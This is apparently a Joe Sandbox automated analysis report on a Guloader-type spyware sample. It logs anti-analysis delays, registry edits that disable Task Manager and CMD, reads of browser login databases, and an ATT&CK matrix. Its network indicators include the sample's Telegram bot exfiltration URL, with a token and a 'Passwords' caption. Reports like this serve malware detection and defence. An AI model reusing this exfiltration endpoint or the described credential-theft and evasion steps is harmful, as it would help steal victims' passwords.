            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598165s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -598046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596952s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596513s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595840s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595152s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -595045s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594811s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exe TID: 4844Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_0040672B FindFirstFileW,FindClose,1_2_0040672B
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AFA
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00402868 FindFirstFileW,1_2_00402868
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598976Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598828Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598717Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598500Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598165Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 598046Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597937Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597828Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597718Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597499Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597171Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596952Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596513Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595840Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595152Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 595045Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594921Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594811Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeThread delayed: delay time: 594359Jump to behavior
            Source: v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004059000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000003FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeAPI call chain: ExitProcess graph end nodegraph_1-4589
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeAPI call chain: ExitProcess graph end nodegraph_1-4746
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00402DF3 SetTimer,wsprintfW,SetWindowTextW,LdrInitializeThunk,SetDlgItemTextW,1_2_00402DF3
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_6FFB1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6FFB1B5F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeProcess created: C:\Users\user\Desktop\v4nrZtP7K2.exe "C:\Users\user\Desktop\v4nrZtP7K2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Users\user\Desktop\v4nrZtP7K2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4nrZtP7K2.exe PID: 4256, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4nrZtP7K2.exe PID: 4256, type: MEMORYSTR
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4nrZtP7K2.exe PID: 4256, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4nrZtP7K2.exe PID: 4256, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: v4nrZtP7K2.exe PID: 4256, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory215
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            21
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets41
            Virtualization/Sandbox Evasion
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            v4nrZtP7K2.exe63%ReversingLabsWin32.Trojan.Guloader
            v4nrZtP7K2.exe78%VirustotalBrowse
            v4nrZtP7K2.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsrBE9D.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.telegram0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.181.238
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.225
              truefalse
                high
                reallyfreegeoip.org
                104.21.48.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comv4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgv4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349BB000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000348E7000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botv4nrZtP7K2.exe, 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/ov4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004059000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://translate.google.com/translate_a/element.jsv4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000405E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000003FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://reallyfreegeoip.org/xml/8.46.123.189ecv4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegramv4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://reallyfreegeoip.orgv4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/v4nrZtP7K2.exe, 00000005.00000002.2920114174.0000000004059000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2179199389.0000000004065000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgv4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034821000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comv4nrZtP7K2.exe, 00000005.00000003.2145893551.000000000406D000.00000004.00000020.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000003.2145720791.000000000406D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comv4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorv4nrZtP7K2.exefalse
                                                          high
                                                          http://api.telegram.orgv4nrZtP7K2.exe, 00000005.00000002.2943654108.00000000349ED000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A25000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034BA6000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034C30000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034A89000.00000004.00000800.00020000.00000000.sdmp, v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namev4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndnv4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://reallyfreegeoip.org/xml/v4nrZtP7K2.exe, 00000005.00000002.2943654108.0000000034851000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                132.226.8.169
                                                                checkip.dyndns.comUnited States
                                                                16989UTMEMUSfalse
                                                                104.21.48.1
                                                                reallyfreegeoip.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.181.238
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                142.250.181.225
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588131
                                                                Start date and time:2025-01-10 21:38:51 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 8m 4s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:v4nrZtP7K2.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:fdf9354cf20fb94544d6bafaa777e8a40eba2d603e648b3dbdf35344d639b19d.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 95%
                                                                • Number of executed functions: 158
                                                                • Number of non-executed functions: 110
                                                                Cookbook Comments:
